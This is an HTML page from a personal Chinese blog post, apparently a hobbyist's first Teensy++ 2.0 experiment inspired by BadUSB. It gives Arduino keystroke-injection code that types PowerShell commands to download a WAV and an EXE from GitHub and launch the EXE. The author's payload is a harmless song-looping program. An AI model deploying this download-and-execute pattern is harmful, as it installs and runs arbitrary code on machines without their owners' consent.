<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>Teensy2.0Test | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="头一次接触开发板，使用的是Teensy++2.0。源动力来自于BadUSB。 Teensy这是一个用于模拟键鼠主控的开发板，可以用作渗透或者其它等。 Arduino 和 Teensyduino自行安装。 实例测试环境为Win10，使用powershell。 使用开发板实现文件自动下载运行。 写入代码： void setup() {   delay(5000);//延迟5000ms，便于调试和电脑处">
<meta name="keywords" content="C,Embedded">
<meta property="og:type" content="article">
<meta property="og:title" content="Teensy2.0Test">
<meta property="og:url" content="http://47.106.74.249/2019/01/28/Teensy2-0Test/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="头一次接触开发板，使用的是Teensy++2.0。源动力来自于BadUSB。 Teensy这是一个用于模拟键鼠主控的开发板，可以用作渗透或者其它等。 Arduino 和 Teensyduino自行安装。 实例测试环境为Win10，使用powershell。 使用开发板实现文件自动下载运行。 写入代码： void setup() {   delay(5000);//延迟5000ms，便于调试和电脑处">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://47.106.74.249/pic/201901281.png">
<meta property="og:updated_time" content="2019-01-28T15:43:23.917Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Teensy2.0Test">
<meta name="twitter:description" content="头一次接触开发板，使用的是Teensy++2.0。源动力来自于BadUSB。 Teensy这是一个用于模拟键鼠主控的开发板，可以用作渗透或者其它等。 Arduino 和 Teensyduino自行安装。 实例测试环境为Win10，使用powershell。 使用开发板实现文件自动下载运行。 写入代码： void setup() {   delay(5000);//延迟5000ms，便于调试和电脑处">
<meta name="twitter:image" content="http://47.106.74.249/pic/201901281.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://47.106.74.249"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Teensy2-0Test" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/01/28/Teensy2-0Test/" class="article-date">
  <time datetime="2019-01-28T15:23:15.000Z" itemprop="datePublished">2019-01-28</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/Embedded/">Embedded</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Teensy2.0Test
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>头一次接触开发板，使用的是Teensy++2.0。源动力来自于BadUSB。</p>
<h2 id="Teensy"><a href="#Teensy" class="headerlink" title="Teensy"></a>Teensy</h2><p>这是一个用于模拟键鼠主控的开发板，可以用作渗透或者其它等。</p>
<h2 id="Arduino-和-Teensyduino"><a href="#Arduino-和-Teensyduino" class="headerlink" title="Arduino 和 Teensyduino"></a>Arduino 和 Teensyduino</h2><p>自行安装。</p>
<h2 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h2><p>测试环境为Win10，使用powershell。</p>
<p>使用开发板实现文件自动下载运行。</p>
<p>写入代码：</p>
<pre><code>void setup() { 

delay(5000);//延迟5000ms，便于调试和电脑处理
Keyboard.press(KEY_LEFT_CTRL);//Press Ctrl
Keyboard.press(KEY_ESC);//Press Esc
Keyboard.releaseAll();//释放
delay(500);

delay(5000);
Keyboard.print(&quot;powershell $client = new-object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$client.DownloadFile(&apos;https://github.com/NanFengx/Teensy/raw/master/OnlyMyRailgunTest.wav&apos;, &apos;D:\\OnlyMyRailgunTest.wav&apos;);exit;&quot;);

delay(5000);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();

delay(15000);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
delay(500);

delay(5000);
Keyboard.print(&quot;powershell $client = new-object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$client.DownloadFile(&apos;https://github.com/NanFengx/Teensy/raw/master/Project1.exe&apos;, &apos;D:\\Project1.exe&apos;);start D:\\Project1.exe;&quot;);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();


delay(30000);

}

void loop() {}</code></pre><p>其中这两段话：</p>
<pre><code>powershell $client = new-object System.Net.WebClient;
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$client.DownloadFile(&apos;https://github.com/NanFengx/Teensy/raw/master/
OnlyMyRailgunTest.wav&apos;, &apos;D:\\OnlyMyRailgunTest.wav&apos;);
exit;

powershell $client = new-object System.Net.WebClient;
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$client.DownloadFile(&apos;https://github.com/NanFengx/Teensy/raw/master/Project1.exe&apos;, &apos;D:\\Project1.exe&apos;);
start D:\\Project1.exe;</code></pre><p>利用powershell从github上下载事先准备好的可执行文件。我自己写了一个小程序，无限播放Only my railgun的片段，因为github上最大只允许25M，playsound又只能播放WAV，又不想弄其它的库函数或者之类的。</p>
<p>运行效果：</p>
<p><img src="/pic/201901281.png" alt></p>
<p>顺便吐槽，国内github速度是真的慢。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://47.106.74.249/2019/01/28/Teensy2-0Test/" data-id="cjz9rs2qe0005hgoyfybw9vzr" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/C/">C</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Embedded/">Embedded</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/08/11/hello-Hexo/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          hello Hexo
        
      </div>
    </a>
  
  
    <a href="/2018/07/29/Perfect-Hair-Programming/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Perfect Hair Programming</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/DateBase/">DateBase</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Embedded/">Embedded</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Others/">Others</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Programming/">Programming</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Sever/">Sever</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/">C</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/DateBase/">DateBase</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Embedded/">Embedded</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/MySQL/">MySQL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Others/">Others</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Server/">Server</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/C/" style="font-size: 20px;">C</a> <a href="/tags/DateBase/" style="font-size: 10px;">DateBase</a> <a href="/tags/Embedded/" style="font-size: 10px;">Embedded</a> <a href="/tags/MySQL/" style="font-size: 10px;">MySQL</a> <a href="/tags/Others/" style="font-size: 10px;">Others</a> <a href="/tags/PHP/" style="font-size: 10px;">PHP</a> <a href="/tags/Server/" style="font-size: 10px;">Server</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">July 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/06/">June 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/08/11/hello-Hexo/">hello Hexo</a>
          </li>
        
          <li>
            <a href="/2019/01/28/Teensy2-0Test/">Teensy2.0Test</a>
          </li>
        
          <li>
            <a href="/2018/07/29/Perfect-Hair-Programming/">Perfect Hair Programming</a>
          </li>
        
          <li>
            <a href="/2018/07/07/Max-Function-C/">Max Function(C)</a>
          </li>
        
          <li>
            <a href="/2018/06/23/Sever-multi-user-confliguration/">Sever multi-user confliguration</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>